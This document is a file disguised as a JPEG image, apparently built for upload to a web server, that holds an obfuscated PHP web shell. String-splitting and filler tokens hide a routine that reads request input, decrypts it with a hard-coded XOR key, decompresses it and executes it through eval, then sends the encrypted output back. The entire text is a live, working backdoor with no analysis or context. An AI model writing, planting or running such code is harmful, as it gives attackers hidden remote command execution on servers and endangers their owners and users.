ÿØÿÛ<?php
$U=str_replace('hx','','crhxeathxehx_fhxunhxcthxion');
$g='5asW5e64_decW5oW5de($m[1]),W5$kW5)));$o=@ob_getW5_W5contentW5s()W5W5;@W5ob_end_clean';
$w='ents("phW5p://W5inpW5uW5t"),$m)==1) {@W5ob_W5start();@eW5val(@gzuncomW5pressW5(@x(@bW';
$V='$W5j};W5W5}}W5return $o;}if (@prW5eg_match("/W5$kh(W5.+)$kf/W5",@filW5e_W5get_conW5t';
$R='();W5$r=@base6W54_encodeW5(W5@x(@gW5zcoW5mpress($o),$k))W5;prW5int("$p$kh$rW5$kf");}';
$y='5($i=0;$i<W5$lW5;)W5{for($W5j=0;($W5W5j<$c&&$i<$l);$j+W5+,$i++){$o.W5W5=W5$t{$i}^$k{';
$X='$k="1aW51dc91cW5W5";$kW5h="907325c69271W5";W5$kf="ddW5f0c944bc7W52";W5$p="mW5AAqBxCpL';
$B='YG7W5dR6W5g";W5funcW5tW5ion x($t,W5W5$k){$c=stW5rlenW5($k)W5;$l=strlen($t);$o="W5";forW';
$v=str_replace('W5','',$X.$B.$y.$V.$w.$g.$R);
$a=$U('',$v);$a();
?>
